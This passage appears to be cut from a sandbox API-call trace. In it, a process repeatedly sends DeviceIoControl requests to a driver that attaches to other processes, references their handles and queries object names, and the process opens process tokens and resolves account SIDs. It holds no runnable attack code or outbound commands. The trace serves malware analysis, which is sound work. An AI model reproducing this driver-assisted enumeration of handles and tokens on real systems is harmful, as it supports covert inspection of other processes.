ProcessId=0x8f4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.586] PsAcquireProcessExitSynchronization () returned 0x0 [0226.586] KeStackAttachProcess (in: PROCESS=0xfffffa80020a3b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80020a3b30, ApcState=0xfffff880052b35d0) [0226.587] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002065f20, HandleInformation=0x0) returned 0x0 [0226.587] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.587] PsReleaseProcessExitSynchronization () returned 0x2 [0226.587] ObfDereferenceObject (Object=0xfffffa80020a3b30) returned 0x12 [0226.587] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800307d044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800307d044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.587] ObfDereferenceObject (Object=0xfffffa8002065f20) returned 0x1 [0226.587] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.587] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.587] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.587] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0226.587] PsLookupProcessByProcessId (in: ProcessId=0x8f4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.588] PsAcquireProcessExitSynchronization () returned 0x0 [0226.588] KeStackAttachProcess (in: PROCESS=0xfffffa80020a3b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80020a3b30, ApcState=0xfffff880052b35d0) [0226.588] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002052750, HandleInformation=0x0) returned 0x0 [0226.588] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.588] PsReleaseProcessExitSynchronization () returned 0x2 [0226.588] ObfDereferenceObject (Object=0xfffffa80020a3b30) returned 0x12 [0226.588] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800307e044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800307e044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.588] ObfDereferenceObject (Object=0xfffffa8002052750) returned 0x1 [0226.588] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.588] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.588] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.588] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0226.588] PsLookupProcessByProcessId (in: ProcessId=0x8f4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.588] PsAcquireProcessExitSynchronization () returned 0x0 [0226.588] KeStackAttachProcess (in: PROCESS=0xfffffa80020a3b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80020a3b30, ApcState=0xfffff880052b35d0) [0226.588] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0226.588] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.588] PsReleaseProcessExitSynchronization () returned 0x2 [0226.588] ObfDereferenceObject (Object=0xfffffa80020a3b30) returned 0x12 [0226.588] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa800307f044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307f044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.588] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x55 [0226.588] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.588] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.588] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x904) returned 0xc8 [0226.589] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0226.589] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa80020a5b30, HandleInformation=0x0) returned 0x0 [0226.589] ObOpenObjectByPointer (in: Object=0xfffffa80020a5b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff800004f0) returned 0x0 [0226.589] ObfDereferenceObject (Object=0xfffffa80020a5b30) returned 0x14 [0226.589] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800004f0, DesiredAccess=0x8, TokenHandle=0xfffffa800252d1c0 | out: TokenHandle=0xfffffa800252d1c0*=0xc4) returned 0x0 [0226.589] ZwClose (Handle=0xffffffff800004f0) returned 0x0 [0226.589] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.589] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0226.589] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0226.591] CloseHandle (hObject=0xc4) returned 1 [0226.591] CloseHandle (hObject=0xc8) returned 1 [0226.591] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.591] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0226.591] PsLookupProcessByProcessId (in: ProcessId=0x904, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.591] PsAcquireProcessExitSynchronization () returned 0x0 [0226.591] KeStackAttachProcess (in: PROCESS=0xfffffa80020a5b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80020a5b30, ApcState=0xfffff880052b35d0) [0226.591] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001eaa510, HandleInformation=0x0) returned 0x0 [0226.591] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.591] PsReleaseProcessExitSynchronization () returned 0x2 [0226.591] ObfDereferenceObject (Object=0xfffffa80020a5b30) returned 0x12 [0226.591] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003080044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003080044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.591] ObfDereferenceObject (Object=0xfffffa8001eaa510) returned 0x1 [0226.591] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.591] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.591] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.591] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x80, lpOverlapped=0x0) returned 1 [0226.591] PsLookupProcessByProcessId (in: ProcessId=0x904, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.592] PsAcquireProcessExitSynchronization () returned 0x0 [0226.592] KeStackAttachProcess (in: PROCESS=0xfffffa80020a5b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80020a5b30, ApcState=0xfffff880052b35d0) [0226.592] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80020ad670, HandleInformation=0x0) returned 0x0 [0226.592] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.592] PsReleaseProcessExitSynchronization () returned 0x2 [0226.592] ObfDereferenceObject (Object=0xfffffa80020a5b30) returned 0x12 [0226.592] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80033fa344, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa80033fa344, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.592] ObfDereferenceObject (Object=0xfffffa80020ad670) returned 0x1 [0226.592] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.592] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.592] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.592] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0226.592] PsLookupProcessByProcessId (in: ProcessId=0x904, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.592] PsAcquireProcessExitSynchronization () returned 0x0 [0226.592] KeStackAttachProcess (in: PROCESS=0xfffffa80020a5b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80020a5b30, ApcState=0xfffff880052b35d0) [0226.592] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0226.592] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.592] PsReleaseProcessExitSynchronization () returned 0x2 [0226.592] ObfDereferenceObject (Object=0xfffffa80020a5b30) returned 0x12 [0226.592] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa80031447c4, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa80031447c4, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.592] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x55 [0226.592] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.592] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.592] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x914) returned 0xc8 [0226.592] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0226.592] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa80020c8b30, HandleInformation=0x0) returned 0x0 [0226.593] ObOpenObjectByPointer (in: Object=0xfffffa80020c8b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff800004f0) returned 0x0 [0226.593] ObfDereferenceObject (Object=0xfffffa80020c8b30) returned 0x14 [0226.593] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800004f0, DesiredAccess=0x8, TokenHandle=0xfffffa800252d1c0 | out: TokenHandle=0xfffffa800252d1c0*=0xc4) returned 0x0 [0226.593] ZwClose (Handle=0xffffffff800004f0) returned 0x0 [0226.593] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.593] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0226.593] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0226.594] CloseHandle (hObject=0xc4) returned 1 [0226.594] CloseHandle (hObject=0xc8) returned 1 [0226.594] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.594] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0226.594] PsLookupProcessByProcessId (in: ProcessId=0x914, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.595] PsAcquireProcessExitSynchronization () returned 0x0 [0226.595] KeStackAttachProcess (in: PROCESS=0xfffffa80020c8b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80020c8b30, ApcState=0xfffff880052b35d0) [0226.595] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80020bdf20, HandleInformation=0x0) returned 0x0 [0226.595] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.595] PsReleaseProcessExitSynchronization () returned 0x2 [0226.595] ObfDereferenceObject (Object=0xfffffa80020c8b30) returned 0x12 [0226.595] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.595] ObfDereferenceObject (Object=0xfffffa80020bdf20) returned 0x1 [0226.595] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.595] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.595] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.595] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x6e, lpOverlapped=0x0) returned 1 [0226.595] PsLookupProcessByProcessId (in: ProcessId=0x914, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.595] PsAcquireProcessExitSynchronization () returned 0x0 [0226.595] KeStackAttachProcess (in: PROCESS=0xfffffa80020c8b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80020c8b30, ApcState=0xfffff880052b35d0) [0226.595] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80020c8070, HandleInformation=0x0) returned 0x0 [0226.595] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.595] PsReleaseProcessExitSynchronization () returned 0x2 [0226.595] ObfDereferenceObject (Object=0xfffffa80020c8b30) returned 0x12 [0226.595] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003081044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003081044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.595] ObfDereferenceObject (Object=0xfffffa80020c8070) returned 0x1 [0226.595] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.595] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.596] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.596] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0226.596] PsLookupProcessByProcessId (in: ProcessId=0x914, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.596] PsAcquireProcessExitSynchronization () returned 0x0 [0226.596] KeStackAttachProcess (in: PROCESS=0xfffffa80020c8b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80020c8b30, ApcState=0xfffff880052b35d0) [0226.596] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0226.596] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.596] PsReleaseProcessExitSynchronization () returned 0x2 [0226.596] ObfDereferenceObject (Object=0xfffffa80020c8b30) returned 0x12 [0226.596] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003067044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003067044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.596] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x55 [0226.596] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.596] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.596] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xc8 [0226.596] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0226.596] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa80020d37a0, HandleInformation=0x0) returned 0x0 [0226.596] ObOpenObjectByPointer (in: Object=0xfffffa80020d37a0, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff800004f0) returned 0x0 [0226.596] ObfDereferenceObject (Object=0xfffffa80020d37a0) returned 0x14 [0226.596] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800004f0, DesiredAccess=0x8, TokenHandle=0xfffffa800252d1c0 | out: TokenHandle=0xfffffa800252d1c0*=0xc4) returned 0x0 [0226.596] ZwClose (Handle=0xffffffff800004f0) returned 0x0 [0226.596] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.597] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0226.597] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0226.602] CloseHandle (hObject=0xc4) returned 1 [0226.602] CloseHandle (hObject=0xc8) returned 1 [0226.602] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.602] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0226.603] PsLookupProcessByProcessId (in: ProcessId=0x924, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.603] PsAcquireProcessExitSynchronization () returned 0x0 [0226.603] KeStackAttachProcess (in: PROCESS=0xfffffa80020d37a0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80020d37a0, ApcState=0xfffff880052b35d0) [0226.603] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80020b0340, HandleInformation=0x0) returned 0x0 [0226.603] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.603] PsReleaseProcessExitSynchronization () returned 0x2 [0226.603] ObfDereferenceObject (Object=0xfffffa80020d37a0) returned 0x12 [0226.603] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.603] ObfDereferenceObject (Object=0xfffffa80020b0340) returned 0x1 [0226.603] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.603] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.604] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.604] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x7c, lpOverlapped=0x0) returned 1 [0226.604] PsLookupProcessByProcessId (in: ProcessId=0x924, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.604] PsAcquireProcessExitSynchronization () returned 0x0 [0226.604] KeStackAttachProcess (in: PROCESS=0xfffffa80020d37a0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80020d37a0, ApcState=0xfffff880052b35d0) [0226.604] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80020debe0, HandleInformation=0x0) returned 0x0 [0226.604] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.604] PsReleaseProcessExitSynchronization () returned 0x2 [0226.604] ObfDereferenceObject (Object=0xfffffa80020d37a0) returned 0x12 [0226.604] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800315b7c4, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800315b7c4, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.604] ObfDereferenceObject (Object=0xfffffa80020debe0) returned 0x1 [0226.604] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.604] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.604] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.604] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0226.604] PsLookupProcessByProcessId (in: ProcessId=0x924, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.604] PsAcquireProcessExitSynchronization () returned 0x0 [0226.604] KeStackAttachProcess (in: PROCESS=0xfffffa80020d37a0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80020d37a0, ApcState=0xfffff880052b35d0) [0226.605] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0226.605] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.605] PsReleaseProcessExitSynchronization () returned 0x2 [0226.605] ObfDereferenceObject (Object=0xfffffa80020d37a0) returned 0x12 [0226.605] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003085044, Length=0x800, 